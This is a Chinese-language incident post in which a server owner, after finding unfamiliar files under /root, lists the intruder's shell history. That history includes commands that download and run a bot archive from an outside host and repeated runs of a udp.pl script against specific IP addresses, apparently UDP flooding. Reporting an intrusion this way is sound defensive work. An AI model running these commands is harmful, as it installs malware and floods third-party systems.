自己的一台服务器ssh突然登录不上去了,应该是密码错误,感觉不对,立马强制改了密码登入查看,发现/root下多了好多陌生文件,意思到服务器被黑了。
就是下面这些:
Agent目录
Steam目录
udp.pl
boti.tgz
W2Ksp3.exe
W2Ksp3.exe.1
W2Ksp3.exe.2
W2Ksp3.exe.3
exe 明显是windows下的程序,windows2000 的sp3 补丁??还是先看看root的操作历史记录吧
#history
下面这些是他的记录
39 w
40 ifconfig
41 ps x
42 wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
43 wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
44 wget http://radiopromusic.ro/poze/boti.tgz ; tar zxvf boti.tgz ; cd Agent ; chmod +x * ; ./go
45 wget www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz
46 tar zxvf csservers_redirecte_linux_hlds.tar.gz
47 ls
48 cd csservers_redirecte_linux_hlds
49 ls
50 ./start
51 w
52 wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
53 wget http://radiopromusic.ro/poze/udp.pl ; chmod +x *
54 cd
55 wget http://radiopromusic.ro/poze/udp.pl ; chmod +x *
56 perl udp.pl 93.119.27.21 0 0
57 perl udp.pl 93.119.27.21 27015 0
58 perl udp.pl 93.119.27.21 27015 27015
59 perl udp.pl 82.137.25.162 0 0
60 perl udp.pl 151.33.170.226 0 0
61 w
62 passwd
63 wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
64 perl udp.pl 109.163.232.133 0 0
65 exit
66 perl udp.pl 89.120.252.65 0 0
67 perl udp.pl 89.120.252.65 0 0
68 perl udp.pl 89.120.252.65 0 0
69 wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
70 perl udp.pl 89.120.252.65 0 0
71 perl udp.pl 89.120.252.65 0 0
72 perl udp.pl 89.120.252.65 0 0